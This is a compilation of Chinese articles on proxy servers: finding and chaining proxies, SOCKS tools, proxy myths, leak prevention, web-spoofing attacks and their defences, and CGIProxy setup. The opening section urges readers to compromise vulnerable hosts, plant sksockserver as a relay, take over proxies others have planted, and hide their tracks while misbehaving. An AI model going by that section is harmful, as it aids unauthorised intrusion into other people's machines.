我们搜索 -》代理服务器，会出来大量的网址，我们随便找几个，发现里面有很多代理
但是，代理对于各地的速度会不同，有的还连不上，怎样才能找出真正快的呢？
这里，要用到代理猎手！这个找代理的利器，这个软件在www.ttian.net有下载。
首先，我们将代理列表复制下来，以txt方式保存。
然后打开代理猎手，-》搜索结果-》导入结果（刚才的txt文件）
然后点验证全部！
这样就可以过滤掉连不上的，再点一下时间特性，就可以看出哪个最快了！！！
这样就可以找到许多代理！注意，验证超时的也很有可能是代理！！

全面我们讲了代理的概念和找代理的方法，接下来我们就要讲socks代理，我的最爱~~~
socks代理分为socks4和socks5两种，socks4只支持tcp/ip协议，不支持加密，只支持
ip地址，相对而言socks5功能就要强多了，所以，我们一般用socks5来做跳板！！
但是，现在网上的socks5太少了，毕竟很珍贵嘛~~~
所以，我们只好自己来做了！
我们一般是用snake的sksockserver，我很喜欢snake的这个工具，这样以后就不怕没代理了
我在这里只提供一种思路，具体做法会在另一篇文章中提到！
大家可以用流光扫描，找到有漏洞主机，然后把sksockserver传上去，再安装，net start一下
就搞定了！

讲了这么久居然忘了讲socks5怎么用了！我们 一般是用sockscap32或是sockhttp，但我推荐前者！这是自己的感觉而已。我们用sockscap32给流光挂上代理，就可以从容的去干坏事了，呵呵！
但是，切记，连跳板一样会在上面留下痕迹，所以大家在玩时不要太过火！以免自焚，因为对方
如果认真的话，就算是顺着路由器也可以把你找出来！！！

下面再讲一次我检到一太socks5的事，由于不久前我得到了一个http代理，速度还不错
我就想把它作成socks5，随便用sss扫了一下，先是发现漏洞一大堆，接着就发现很奇怪的开了
一个918的端口，还是socks5的，看来已经有人比我抢先了，哈哈
那我就不好意思了，当然是拿过来用了再说，对吧？

另外，大家要搜socks5的话，可以用proxyhunter或是superscan搜5262，或是1813的端口，
说不定还能搜到几台，不过我建议大家自己做！毕竟，是自己的跳板嘛！！！


代理服务器的几个误区

现在代理服务器(PROXY)可是网络上的热点问题，不少新闻组已经开辟了栏目专门讨论，而几乎所有比较有名的浏览器、下载软件、信件收发软件都支持代理服务器，似乎不支持代理服务器就很落后似的。但代理服务器是否真的象所声称的那样神通广大吗? 下面就笔者的理论和使用经验谈谈现在对代理服务器的一些误解。

一、使用代理之后浏览速度会加快?
    可能很多人都会告诉你，使用了代理服务器之后浏览速度加快了许多，而不少书本上也这样说，不少并非富裕的朋友选择代理服务器的原因也出于此- ---既然书上也这么说，应该不会错吧?但情况真是这样的吗?很不幸，在大多数情况下并不是这样的。我们来看看，代理服务器能加快浏览速度的原理是什么? 它的基本思想是把用户已经浏览过的网站内容保存在代理服务器的CACHE(硬盘)上，当别的用户要浏览相同的网站时，代理服务器就可以把信息直接从自己的磁盘上调出来，节省了从真正的服务器传输数据的时间及数据流量。而我们知道，制约数据传输速度最重要的几个因素分别是∶

  1.线路质量；
  2.你的MODEM和ISP MODEM的接驳速度；
  3.所使用的代理服务器和你的计算机的物理距离；
  4.代理服务器本身的繁忙程度。

    其中，1和2都是已经定下来了的，我们一般无法改变，3是制约速度的很重要的因素。我们来做个比喻∶你选择了一个国外的代理服务器，去浏览一个国内的1 63网站，这时到底使用了代理服务器快呢?还是直接浏览网站快呢?答案不用说大家都知道。不相信的话你可以用PING来测试一下到底谁的响应时间较短。对于绝大多数只在国内悠转的1 69用户，使用了代理服务器可能会更慢。而对于第四个制约因素，有些朋友可能会认为代理服务器在我们浏览一些很繁忙的网站会有帮助- ---因为代理服务器把其内容保存在代理服务器中，访问时不再从真正的网站上下载网页，因此避开了这些繁忙网站上的大塞车，浏览速度应该快些。但他们可能都忽视了这个问题∶代理服务器数目并不多，能提供免费服务的代理服务器就更少了，而且这些免费的服务器都不是专为一个人服务的，你可以使用，其他人当然也可以使用，特别是不少朋友还通过代理服务器上国外的网站，所以，代理服务器的塞车程度，有可能比热门网站的塞车程度更厉害。因此，代理服务器不是一定能提高浏览速度，只有你选择了离你的计算机比较近而且并不繁忙的代理服务器，才能有效提升浏览的速度。在我看来，代理服务器最重要的应用莫过于大家常见的网吧中的代理服务器，它负责局域网中全部工作站的浏览要求，对所有已浏览过的数据进行缓冲，由于局域网中服务器和工作站距离不远，且带的工作站并不多，所以这时代理服务器的加速功能就十分突出。而我们直接用MODEM上网的用户就很难享受那个"福气"了。

二、使用了代理服务器之后能浏览的网站更多?
    不少人认为，使用了代理服务器之后能浏览的网站就更多了，不少人还振振有词∶以前我用169帐号上网是无法浏览国外网站的，现在用了代理服务器之后就可以上了！确实，使用代理服务器能使你访问到一些本来不能浏览的网站，我相信这也是绝大多数国内1 69用户使用代理的最重要原因(据我知道有很多人使用代理服务器都是为了使用ICQ)。但使用了代理服务器也有可能把一些本来能浏览的网站变" 消失"了。为什么呢?很多人都忽视了这么一个问题∶代理服务器仍然是防火墙的一种形式。防火墙一个重要功能是防止用户对一些不信任站点的访问，所以当用户向这些站点发出浏览请求时就会被代理服务器所拒绝。举个例子来说，在以前你用N ETANTS可以下载到某个网站的文件，而使用了代理服务器之后NETANTS却“罢工”的话，那肯定就是你的代理服务器禁止了对这个下载站点的访问。至于为什么要禁止你访问这个站点呢? 很大可能是因为这个站点并非免费，信息从这个站点传过来时要按流量来算钱，所以代理服务器为了节约费用，都禁止了大部分非免费站点的访问。只有所有的代理服务器都不限制用户访问的网站，使用了代理服务器才能访问到更多的网站。只可惜连接不上.

三、使用了代理服务器能降低上网费用
    使用了代理服务器确实能降低一部分上网费用，但对象并非我们，而是那些直接通过网卡上网的固定IP用户。由于直接上网用户的网费是通过数据流量来计算的，这类用户如果设置了通过免费的代理服务器上外国的网站，那么用户的费用就会转嫁到服务器上，由服务器给你交钱( 当然如果用户访问的是国外免费的站点，那么服务器也不用替你交钱)。因为这时候你并没有出国访问，所有的数据都是代理服务器传来给你的，而国外的服务器是把数据传输给了代理服务器，这部分流量当然算代理服务器的钱！所以代理服务器必须要在服务器硬盘上开辟很大一个缓冲区，并且限制用户能访问到的站点- ---都是为了不会使数据流量增加得太多。但纵观全国，除了一些名牌的大学之外，我们“散户”中有谁是通过网卡直接上网的呢?甚至不少朋友连直接上网的概念还不知道呢！对于我们普通用户，上网形式都是通过M ODEM拨到邮电局的服务器，然后再上INTERNET，这时费用的计算是通过连接时间来算的。所以我们并不能享受免费代理服务器节省网费的优越性。相反，如果你选择的代理服务器不当，限制了大部分你以前能访问的网站而你又不知道的话，你可能会花大量时间去反复尝试浏览那些本来能浏览的网站，结果上网费用将大大增加。

四、设置好代理服务器之后就可以一劳永逸?
    许多使用代理服务器朋友都有这样的经历∶在某天某个时候开始忽然所有网站都去不了了，而取消代理之后一切又恢复了正常。为什么呢? 原因在于一切东西都处于发展变化之中，代理服务器也一样。我们先来看一下这个问题∶为什么天底下会有这么好的事?----免费代理服务器，原因主要有两个∶1 .系统的漏洞；2.某些网站为了提高知名度，大概了解用户的爱好和需要，并达到宣传的目的而把服务器设置为免费代理服务器。对于第一种情况，网站管理员一发现这个漏洞肯定会立刻把免费代理服务取消- ---如果他不希望被公司“炒尤鱼”也不希望授人以柄的话；对于第二种情况，在网站宣传的目的已经达到的情况下，他们当然不会肯再为你白花钱，停止免费服务也是正常的事，君不见新闻组上多少索求代理服务器地址的贴子? 所以，免费代理服务器可能随时都会“消失”，你不得不重新用PROXY HUNTER再扫描免费的代理服务器了，但HUNT免费代理服务器也是一个漫长的过程………

    所以，在我看来，设置了代理服务器在许多情况下并不能使你从中获得好处(除了可以出国访问，但站点相当有限)，相反，如果代理服务器设置不当，可能还会给你造成麻烦和损失，正因为这样，曾经为PROXY倾倒的我现在再也没有使用任何代理服务器了。而对于普通用户来说，设置代理服务器与否对网络的使用影响不大，我个人认为，为了减少不必要的麻烦，还是不设置代理服务器上网为好，特别现在163和169已并网的情况下。

网友Lucifer对上文的回应：

    今天看了这篇文章（《代理服务器的几个误区》），感到这篇文章有一些很明显的错误，作者真的对于代理服务器有了解吗？首先，对于加速浏览的问题，很明显作者没有考虑到代理服务器与要访问网站之间的速率一般都比我们普通用户与要访问网站之间的连接速率高不止一个数量级。事实上，一般国外的主机接入速率都是t1一级的，我们访问的一些比较慢的网站，对于代理来说一般是很快的，如果我们和代理之间的速率也比较快（一般总比直接连接那些较慢的站点快吧），速率的提升还是很明显的。这只是一个简单的加法。
还有限制站点的问题，作者也承认，我们目前用的代理服务器，很少有专门就是用来做代理的，大部分都是某些站点的http server配置不当，留下了这个漏洞让我们利用。所以所谓站点限制，也就只是一小部分的并不经常被我们用到的专门做代理的服务器会有（大部分在国内）。对于大多数可以利用的属于本身有漏洞的代理，只要这些站点本身能访问到的地址，我们肯定也可以访问到的。最简单的例子，相信用国外代理上geocities的朋友并不少吧。
对于降低费用的问题，如前所述，只要承认用代理可以加快连接某些网站的速度，那么只要电信还是按时间收费，显然费用也就降下来了。
至于所谓代理一劳永逸的问题，每个用过代理的朋友相信都不会天真的认为在目前国内的环境下会有一个能一直使用，而且速度还可以接受的代理吧。至于搜索是否麻烦，每个人的看法就不一样了。
总之，作者自称曾经“倾倒于代理”，但是从文章中很明显的反映出他对于代理服务器的认识还有很多不足。他的片面（如果不算错误）的观点对于有一定经验的人来说也许不算什么，但是对于经验较少的新手还是有一定误导作用的。建议站长以后对于这种公开发表的东东最好亲自看一下，像这样有明显漏洞的，看法过于片面的文章还是不登出来为好。


代理服务器之三重跳转
作者：小鸟高飞

代理服务器之三重跳转

需要3个软件（在PCHOME均有下载），2个代理
软件1 sockscap21 (http://download.pchome.net/internet/server/proxy/2541.html)
软件2 MultiProxy (http://download.pchome.net/internet/server/proxy/2539.html)
软件3 proxyhunter (http://download.pchome.net/internet/server/proxy/2529.html)
代理1 本地的SOCKS代理服务器(可用proxyhunter搜索)
代理2 国外的普通代理服务器(可到国外代理服务器列表上找一个,能用就行)
设置
1 将3个软件全部装好
2 运行sockscap,在file－settings－SOCKS Servers中填入本地的SOCKS代理服务器地址和端口
3 单击NEW－Browse－选择MultiProxy所在目录,单击MultiProxy主程序－OK确定
4 在sockscap中点击Run!,运行MultiProxy
5 在MultiProxy中选options－Proxy servers list－将你在国外网页上看到的代理填上去－OK确定
6 运行IE,工具－Internet选项－连接－选择你当前使用的连接－设置－在"使用代理服务器"前打勾－填入127.0.0.1,端口8088(这个数据不变的)－OK确定
好了,现在在MultiProxy和sockscap均运行的情况下,在IE地址拦中填入你想去的地方就OK了
如果不行的话,利用proxyhunter中的辅助工具－"主机IP-域名"工具将地址转化为IP地址,
再输入进IE地址栏中,例如www.playboy.com转化为209.247.228.214
以上方法在MODEM,ISDN,ADSL上实现,CM未曾确定,ADSL效果甚佳,MODEM和ISDN效果差一些
我试过可行！但是速度比跳板慢，可在宽带就没有这个问题！


全方位防止电脑泄密

   全方位防止电脑泄密

    有一次我在调电视机时，收到了邻居家玩电视游戏的画面。以前有人做过测试，用一台简易的无线电接收屏幕，在几十米远的距离上清晰地显示出了一台微机正显示的信息。

    不久前网络蠕虫病毒爆发，这个病毒通过电子邮件传播，把本机内“我的文档”下的文件自动捆绑后发给地址簿中保存的或是网络相关的所有邮件地址。

    物理隔离与专机专用

    1. 互联网物理隔离

    国家保密局颁布并于2000年1月1日开始实施的《计算机信息系统国际联网保密管理规定》中要求，涉及国家秘密的电脑信息系统，不得直接或间接地与国际互联网或其他公共信息网络相联接，必须实行物理隔离。凡是涉密电脑，就不应该与互联网相联，换句话说，就是不要在能上网的微机上处理机密文件。

    2. 专机专用

    如果处理涉密文件较多，就应该专门安排微机用于处理机密文件，并且建立单独的机房，限定专人操作，这样不仅可以减少若干可能引起失密的环节，还便于进行防辐射泄密等技术处理。

    防辐射泄密

    1. 专用的铜网机房

    金属网罩并接上深埋的地线后，能有效地屏蔽掉任何电磁辐射，所以建立专用的铜网屏蔽机房，是一种专业的防电磁辐射泄密措施。

    2. 干扰发射天线

    比较简易的一种手段就是在显示器旁接上一个类似电视室内天线的电磁波发射装置，理论上由干扰天线发射的电磁波可以做到和显示器的辐射在同样的波段上，从而掩盖掉微机信号的辐射。但实际上，每一种CRT显示器的辐射可能是有差别的，所以使用这种干扰天线必须注意两点：一是这种干扰天线本身必须具有较宽的波段范围；二是必须对每一套配套使用的装置进行检测和调试，以使CRT和干扰天线发射的电磁波真正处于干扰状态下。

    3. 使用液晶显示器

    液晶显示器的辐射泄漏要比CRT显示器小得多，现在液晶显示器的价格越来越低，所以可以考虑给有保密要求电脑更换成液晶显示器。

    4. 慎用无线连接系统

    二战时期无线电通讯已经很成熟，并且无线通讯要方便得多，但有线通讯在战场上使用得更为普遍，其中最主要原因还是因为无线电通讯被截获与破译的可能性更大。现在像蓝牙这样的无线连接技术已逐步进入实用阶段，但是在无线连接保密性得到确证以前，处理涉密文件，还是应该慎用无线连接的通讯方式。

    防网络泄密

    1. 防磁盘“文件共享”时泄密

    单位内部的一些泄密事件，许多是无意之中发生的，既然是带保密性的文件，就不应该把它放置在无关人员也能接触到的地方，所以个人电脑硬盘在“文件共享”时一定要有限制。个人电脑如果需要设置共享，应该要设置访问密码限制，网络上有些病毒就专门攻击无密码限制的共享硬盘。在一个单位内部设立公共的服务器共享区是可取的，普通文件的交换可以在公共区域进行，这样个人的微机上甚至可以不设置磁盘共享。个别稍微带有保密性的文件可以通过个人邮件传送，而保密性强的文件，则需通过移动存贮介质交换，不应在网上传送。

    2．谨防“特洛伊木马”

    比较有名的“特洛伊木马”类的程序有NetbusPro、BackOrifice、BO、Pwlview、Netspy等，这些程序都属于远程操控程序一类。据文章介绍，NetbusPro甚至能启动连在你电脑上的麦克风或摄像机。所以，如果你的电脑被NetbusPro感染的话，那些在遥远一方的黑客，甚至可以看见你的容貌、听见你说话的声音。

    防止这些黑客或病毒程序，应注意以下几点：一是不要轻易安装一些来历不明的程序；二是不要打开一些可能有问题的文件（特别是陌生人的电子邮件附件）；三是使用并及时更新杀毒软件；四是留意自己微机的“表现”，如运行速度和上网速度的变化，以便及时觉察到不速之客的混入。

    3．“防虫”、“防蛀”

    “防虫”是指防网络蠕虫这样的病毒。或许将文件保存在D盘的目录下更好，而不放在像“C＼My Documents”这样的典型目录中，这样处理，最起码让“蠕虫”搜索和寻找起来困难一些。

    “防蛀”则是小心病毒或操作不当引起的文件残缺或全部丢失。

    防机内文件泄密

    1．使用密码是有益的

    设置开机密码、设置屏保密码、设置文件密码都是有益的一些保护措施，但也不能对密码的有效程度过分信赖，因为这些密码对于专业人员来说都是极易破解的。

    还可以使用一些专门的加密的工具软件，如PC Security，它几乎可以对计算机内所有你想要保护的资源进行保护，下载地址为http://www.tropsoft.com。

    2．注意掌握电脑的使用情况

    DOS时代有一个发生在中关村的经典案例：二人合伙去偷某公司开发的程序，一人借故引开操作人员，另一个乘机从硬盘中快速拷贝。操作人员返回后，怀疑有异，就使用DOSKEY的功能，返查出了盗窃者的操作步骤。Windows系统留有比DOS更多的操作记录，“开始”→“文档”中列有15个最近使用过的文件，“C＼WINDOWS＼History＼3 个星期之前＼我的电脑”中更是列有3个星期来用过的文件。Office最近使用过的文件放在“C＼WINDOWS＼Application Data＼Microsoft＼Office＼Recent”目录下。如果你觉得在你离开时有人调用过你的文件，不妨看一看这些目录下的记录。

    你还可以使用一些工具软件，如“屏幕监视器”，可在http://bj.onlinedown.net/Setup-Spy.htm处下载。无论别人对你的电脑做了什么手脚，屏幕监视器都会忠实记录电脑被使用情况，当你不在计算机旁边的时候，该软件可以帮助你监视计算机的屏幕变化。

    3．硬盘文件的保护

    如果受到条件限制，还有别人也使用你的微机，这样的话可以考虑做一个隐含硬盘分区，用于存放你个人的东西。硬盘分区大师这样的超级硬盘分区工具可以直接做出加密分区，也还可以使用其它的专用小工具，如Protect Z 1．53，大小仅为676KB，下载地址为http//bj．onlinedown．net/ProtectZ．htm。这是一个专用的保护硬盘上的文件或目录的工具，有文件和目录隐藏、无法读娶属性无法更改等多种保护功能。

    防残留文件泄密

    1．防止已删除文件的泄密

    即使是从“回收站”中彻底删除的文件，通过一些工具软件也是容易恢复的。经常运行“磁盘碎片整理程序”是有益的，因为经磁盘碎片整理后，常见的恢复删除工具就无能为力了。

    更保险的做法是使用专用的彻底删除工具软件，如“Clean Disk Security”，可以从网上下载，地址为http://bj.onlinedown.net/CleanDiskSecurity.htm。它可以把不再保留的机密文件彻底删除，不留痕迹。

    2．防止已格式化的硬盘泄密

    任何微机，都难免有要送去修理的时候，这时候就要注意硬盘中是否有内部文件。如果在微机送修之前，将保存有涉密文件的硬盘取下拿到其它微机上格式化一下，甚至重新分区，以为这样就安全了，其实不然，这样的硬盘完全是可以再恢复的。如果使用低级格式化则可以将硬盘上的秘密完全清除。很久以前的一个非常不错的硬盘低级格式化程序现在还在用，这就是LFORMAT，大小仅31KB，在http://www.newhua.com/down/lformat.zip处可下载。

    3．防止已损坏的磁盘泄密

    软盘保存的文件是很容易出故障的，如果软盘读不出来了，就随手扔掉，这也是错误的做法。因为读不出的软盘可能只是个别磁道（特别是零磁道）损坏，修复的方法有多种，所以在扔掉存有机密文件的坏软盘时，必须进行物理处理（砸坏）或强磁场消磁处理。

    对于已损坏的写有机密文件的硬盘，干脆就“物理”处理一下后毁掉，不要为了节省这一点钱去试图修理它。


网站浏览安全细细谈
作者：罗务宏
网站浏览安全细细谈

      Web欺骗是一种具有相当危险性且不易被察觉的黑客攻击手法，一般意义上讲，也就是针对浏览网页的个人用户进行欺骗，非法获取或者破坏个人用户的隐私和数据资料。它危及到普通Web浏览器用户，包括Netscape Navigator用户和Microsoft Internet Explorer用户。

    一、欺骗手法

    攻击者如果想进行Web欺骗就，离不开Web服务器的支持，所以绝大多数情况下，他们在受攻击者和Web服务器之间设立起攻击者自己的Web服务器，这种攻击种类在安全问题中称为“来自中间的攻击”。用户浏览器和真正的服务器之间的数据交换并非是直接的，会被攻击者的服务器截获并处理。利用中间服务器进行行骗，就像罪犯驾驶着盗窃来的警车去“执行公务”，因此相当隐蔽。对于被攻击用户，几乎是不知不觉的，因为他们仍然可以自由登录、链接到该网站的所有页面。对于攻击者而言，在偷偷监视截取信息的同时，也能以受攻击者的名义发送数据到真正的Web服务器，包括以服务器的名义发送数据给受攻击者。

    当用户访问某个这样的站点并进行合理的活动时，可能面对的并不是真实的目标网站，而只是一个攻击者营造的真实站点的翻版，或者说虚拟的镜像，它们之间如此雷同并不会让我们感到潜在的威胁，而此时你的所有注册信息和登录账号口令，甚至一切活动，就源源不断地从这个镜像的入口进入到攻击者控制着的Web服务器。攻击者可以监视、记录、修改所有信息并进行破坏活动。

    例如，在线填写表单时，填入表单的用户密码账号等信息将被获取，从而泄密。在访问网上银行时，你可能根据你所见的银行Web页面，从该行的账户中提取或存入一定数量的存款。因为你相信你所访问的Web页面就是你所需要的银行的Web页面。无论是页面的外观布局、图片标识、链接地址，文字内容还是其它一些相关内容，都让你感到非常熟悉，没有理由不相信。但是，你确实是处在攻击者建立的伪造页面中。

    二、实施过程

    1.诱使用户进入攻击者控制的中间服务器

    攻击者在Web服务器需要提供关于某个Web站点的错误Web页面时，他只需要在自己的服务器上建立一个该站点的拷贝，而不必存储整个真实服务器站点的内容，然后改写这个拷贝中所有的链接获得真实服务器上的所有页面镜像。

    首先，攻击者改写拷贝中所有链接地址(URL)，使它们指向了攻击者的服务器而不是真正的服务器。假定攻击者所处的Web服务器是www.???.com，攻击者通过在所有链接前增加www.???.com来改写URL。例如，abc.efg.com将变为www.???.com/ abc.efg.com。当用户点击改写过的abc.efg.com，进入的确是：www.???.com，然后由该中间服务器向abc.efg.com发出请求并获得真正的文档，然后改写文档中的所有链接，最后经过http://www.???.com返回给用户的浏览器。

    可见，用户通过改写后的链接登录目标站点时，实际上先是经由中间服务器，然后才向目标服务器请求文档，而目标服务器返回的文档必须经由中间服务器，改写所有链接后才传回给用户浏览器。很显然，修改过的文档中的所有URL都指向了www.???.com，当用户点击任何一个链接都会直接进入这个页面，而不会直接进入真正的网站。只要用户由此进入其它网页，那么他们是永远不会摆脱掉受攻击的可能的。

    伪造网页中的表单，如果被填写就构成了表单欺骗，同样神不知鬼不觉。表单的确定信息被编码到链接地址行中，内容会以HTML形式返回。前面讲到，所有页面的URL都已经被改写，那么表单欺骗将是很自然的事情了。

    当受攻击者提交表单后，所提交的数据进入了攻击者的服务器。攻击者的服务器能够观察，甚至是修改所提交的数据。同样地，在得到真正的服务器返回信息后，攻击者将向受攻击者返回信息。

2.发布欺骗页

    Web攻击者必须设法引诱用户去访问并点击他设定的Web陷阱，黑客往往使用下面几种方法：

    (1)把错误的Web链接放到一个热门Web站点上；

    (2)如果受攻击者使用基于HTML的邮件，通过电子邮件发送伪造的Web页面给用户；

    (3)创建错误的Web索引，指示给搜索引擎；

    (4)在网络公众场合，如BBS、OICQ，论坛或聊天室散播包含错误链接的网站网址。

    三、如何防范

    1.对于个人用户

    (1)查看源文件

    攻击者并不是不留丝毫痕迹，HTML源文件会使这种欺骗暴露无遗。通过点击鼠标右键或者在浏览器中点击菜单“查看”“源文件”，用户可以阅读当前的HTML源文件。可以发现当前页URL地址的信息并同网页上的真实地址相对照，你能够发现被改写的URL，因此可以觉察到危险。

    例如，你收到一封263邮局的HTML格式信件，查看源文件，根据前面的介绍，很容易发现是否有伪造的痕迹。

    因此，建议不要通过来历不明的Web站点登录安全站点，如通过某个个人站点登录263服务器。对于搜索引擎或从其它场合得到的站点，应仔细甄别，防止受骗。

    (2)禁止浏览器中的JavaScript功能

    各类攻击者的服务器，页面都包含大量的JavaScript脚本以实现其不可告人的目的，此时可将JavaScript功能禁止或者改为使用前提示。

    方法是：在IE浏览器中，点击菜单“工具”“Internet选项”，切换到“安全”选项卡“自定义级别”，弹出“安全设置”框，在里面对JavaScript功能选择“禁止”。

    (3)确保浏览器的连接提示状态可见，它会给你提供当前位置的各类信息；

    (4)仔细观察你所点击的URL链接，一般会在状态栏中或地址栏得到正确的显示。

    2.对于服务器

    个人用户对于服务器端是无能为力的，此处我们仅给大家提供一些服务器端安全预防措施，希望会给个人站点的管理者一些有益的提示。

    Web服务器端安全预防措施：限制在Web服务器开账户，定期删除一些久不登录的用户；对在Web服务器上开的账户，对注册用户口令长度作出要求并提示定期更改，防止被盗用造成隐患；尽量使Ftp, Mail等服务器与Web服务器分开；定期查看服务器中的日志文件，分析一切可疑事件；设置好Web服务器上系统文件的权限和属性；不要把Web服务器与FTP目录指在同一目录；必要时限制访问用户IP或DNS；如果采用CGI程序，应放在独立于HTML存放目录之外的CGI-BIN下；在用C来编写CGI程序时尽量少用popen()、system()和所有涉及/bin/sh的shell命令。

    此外，编译语言(CGI、PERL等)比解释语言(PHP、JSP等)更安全。至于许多Web服务器本身都存在的一些安全漏洞，不是本文探讨的范畴，有兴趣的读者可参阅相关资料。


SocksCap+socks2http运用
    Sockscap32是NEC公司开发的一个使所有winsock应用都可以用socks代理的工具。它给winsock的系统调用库加上了个“帽子”，所有在sockscap环境下应用产生的winsock调用都会被sockcap截获，在你正确设置sockcap32的情况下，这样的调用请求会自动转化为向特定socks代理的请求，如此，你的原先不支持socks代理的应用也可以用socks代理了。sockcap32支持socks4和socks5代理，socks4代理只支持TCP应用，而socks5代理则可以支持TCP和UDP，不过由于socks5代理有专门的用户身份确认操作，而socks4代理没有，所以通常对外开放的socks代理都是socks4代理，因此,UDP应用通常都不能被支持。

    推荐SocksCap软件，有了这个软件，加上一个Socks代理服务器，你的几乎所有的网络软件均可以正常使用了，下面就听我的介绍吧，这里就顺便介绍一下什么事Socks，从网络上查得的资料上说："Socks是个电路级网关，是David Koblas在1990年开发的。此后，就一直作为Internet RFC中的开放标准。Socks在协议栈的TCP层上运行。与Winsock不同的是，Socks不要求应用程序遵循特定的操作系统平台，比如象Winsock那样遵循Windows。Socks代理与应用层代理、HTTP层代理不同，Socks代理只是简单地传递数据包，而不必关心是何种应用协议(比如FTP、HTTP和NNTP请求)。所以Socks代理服务器比应用层代理服务器要快得多。"

    至于我们常说的Socks4和Socks5代理服务器的区别呢，其中Socks4代理只支持TCP协议，socks5代理支持TCP和UDP协议，还支持各种身份验证机制，服务器端域名解析等。socks4能干的socks5都可以干，反过来就不行了。
SocksCAP现在地最新版本是2.1 ，可以通过下面的地址下载：
http://www.socks.nec.com/ 一路按"Next"按钮即可顺利安装成功。第一次运行SocksCAP，会询问你是否立刻进行配置。选择"Yes"。

    很有意思SocksCap能把Socks代理转换成HTTP代理，而socks2http又能把http代理转换成Socks代理。有这这两个软件我们就可以畅游网络世界了。为什么要组合着用呢？因为SocksCap用的是Socks代理，而Socks代理又太少了、而且还分Socks4和Socks5，Socks5什么都可以代理，而Socks4只能做TCP协议代理。那怎么解决呢？有办法，有了socks2http就解决了。Http Proxy网上有的是，而且还有代理猎手软件搜索多的是，只要有了http代理就有了Socks代理。因为socks2http就是把http代理模拟成Socks代理。

     Sockscap32的设置如下：点击Sockscap32的File--Settings，在SOCKS Server填上127.0.0.1,PORT填上1080。在protocol有几个选项，SOCKS Version4和SOCKS Version5，SOCKS Version5选上、下面三个选项选第三个，其他的不用设置，点击OK。然后我们把浏览器、邮件群发软件、ADR、自由网[为保障访问安全，请务必使用“暂用”模式。（即填加运行sfreenet.bat到Sockscap32而不是qfreenet.bat。）暂用模式的节点只从自由网提取数据，并不作为自由网中提供服务的节点的一员。所以它比作为正式节点的“常用”模式节点要更加安全。需要注意的是：不要在“暂用”和“常用”模式之间切换使用，否则会导致暂用模式的安全机制失效。 为保障访问安全，请务必使用“暂用”模式。（即运行sfreenet.bat而不是qfreenet.bat。）暂用模式的节点只从自由网提取数据，并不作为自由网中提供服务的节点的一员。所以它比作为正式节点的“常用”模式节点要更加安全。需要注意的是：不要在“暂用”和“常用”模式之间切换使用，否则会导致暂用模式的安全机制失效 ]，等加入其中。用鼠标拖动IE到Sockscap32界面上，然后会弹出菜单选NEW application profile--然后又弹出一个界面，点击OK。要启动软件只要双击就行了。


利用unicode漏洞，轻松建立自己的代理服务器

通过CGIProxy建立基于Web的安全匿名代理服务器

这是通过 Win2000 + IIS + ActivePerl + SSL + CGIProxy 的基于Web的安全匿名代理服务器浏览CGIProxy作者James Marshall的网站截图。这样的服务器和Safeweb.com--安全网的功能、原理基本相同，是“三角男孩”软件以外的又一个选择。

CGIProxy和“三角男孩”的比较：

 | CGIProxy | “三角男孩”
原理 | 通过SSL和CGI程序结合，达到基于Web安全匿名代理功能 | Safeweb.com--安全网的“特殊代理”。 Safeweb.com本身提供基于Web的安全匿名代理
支持平台 | Win2000、Linux | Win2000、Linux
必要软件 | 1、支持perl的Web服务器--如：Apache、IIS等 2、perl解析器--ActivePerl | 不详
辅助软件 | 1、SSL的支持： 1.1、IIS：本身自带SSL 1.2、Apache：需要Openssl的支持 2、支持代理https需要Openssl的支持（可选） | 不详
支持代理类型 | http、ftp、https(1.4.1) | http、https
最新版本 | 1.5 | 不详
扩展性 | 可以自己修改CGIProxy的源程序 例如： 限定可代理的网站 添加自己网站的广告 | 不详
安全性 | SSL保护 服务器本身可以看到流经自己的数据 | SSL保护 服务器本身看不到流经的数据，但Safeweb.com可以看到流经的数据

通过CGIProxy建立基于Web的安全匿名代理服务器一点也不复杂，你有自己的主机很快就会有一个象Safeweb.com一样的网站。一般公司的主机网络负担很轻，建立这样的额外服务可以充分利用资源服务大家，同时也可以替公司做网络宣传；当然个人主机也适用。

以下是在Windows2000下安装的详细记录，提供给没有经验的朋友参考。
这种是最简单的，但性能可能不是最好的。
最好性能可能是这样的架构：Linux + Apache + ActivePerl + Openssl + CGIProxy 。

平台 | Win2000 Server
Web服务器 | IIS 5.0(Win2000 Server自带)
CA | 证书颁发机构(Win2000 Server自带)
perl解析器 | ActivePerl-5.6.1.631-MSWin32-x86.msi
CGIProxy | CGIProxy1.5

在已有的Win2000 Server上面

1、下载ActivePerl-5.6.1.631-MSWin32-x86.msi和CGIProxy1.5

2、安装IIS 5.0和证书颁发机构

双击“我的电脑|控制面板|添加/删除程序|添加/删除Windows组件”，选中“Internet 信息服务（IIS）”和“证书服务”之后点击下一步，然后按提示（建议是默认设置）完成。

3、建立自己给自己颁发证书的 SSL - IIS
双击“我的电脑|控制面板|管理工具|Internet 信息服务”，“默认 Web 站点”点击右键，点击“目录安全性|服务器证书”，“创建新证书”，然后按提示（建议是默认设置）完成，得到一个certreq.txt的文件。
确保启动了“Internet 信息服务（IIS）”，访问http://127.0.0.1/certsrv/，选中“申请证书”，“下一步”，选中“高级申请”，“下一步”，选中“使用 base64 编码的 PKCS #10 文件提交一个证书申请，或使用 base64 编码的 PKCS #7 文件更新证书申请。”，“下一步”，按提示将certreq.txt文件内容贴到“Base64 编码证书申请(PKCS #10 或 #7): ”的空白处，然后“提交”。这样就完成了证书申请。

双击“我的电脑|控制面板|管理工具|证书颁发机构”，选中“待定申请”，可以看到刚才的“申请证书”，选中“申请证书”，点击右键“所有任务|颁发”。选中“颁发的申请”，选中刚才颁发的证书，点击右键“所有任务|打开|详细信息|复制到文件”，然后按提示（建议是默认设置）完成，得到一个xxx.cer的文件，即得到自己给自己颁发的证书。

回到“Internet 信息服务”的“默认 Web 站点|目录安全性|服务器证书”，按提示把刚才得到的xxx.cer的文件安装进去。这样 IIS + SSL 就完成了。

4、安装ActivePerl-5.6.1.631-MSWin32-x86.msi，按提示（建议是默认设置）完成。完成后设置“Internet 信息服务”：回到“Internet 信息服务”的“默认 Web 站点|主目录”的“应用程序设置”的“配置”，“应用程序映射|添加”，“可执行文件”填“C:\Perl\bin\perl.exe %s %s”--如果ActivePerl的安装路径不是“C:\Perl\”请修改成相应的路径，“扩展名”填“.cgi”，其他默认。

5、修改CGIProxy--nph-proxy.cgi
CGIProxy必须修改两个地方才能支持SSL和IIS。
打开nph-proxy.cgi，不要用notepad，要用wordpad。
$RUNNING_ON_WINDOWS= 0 ; 改成 $RUNNING_ON_WINDOWS= 1 ;
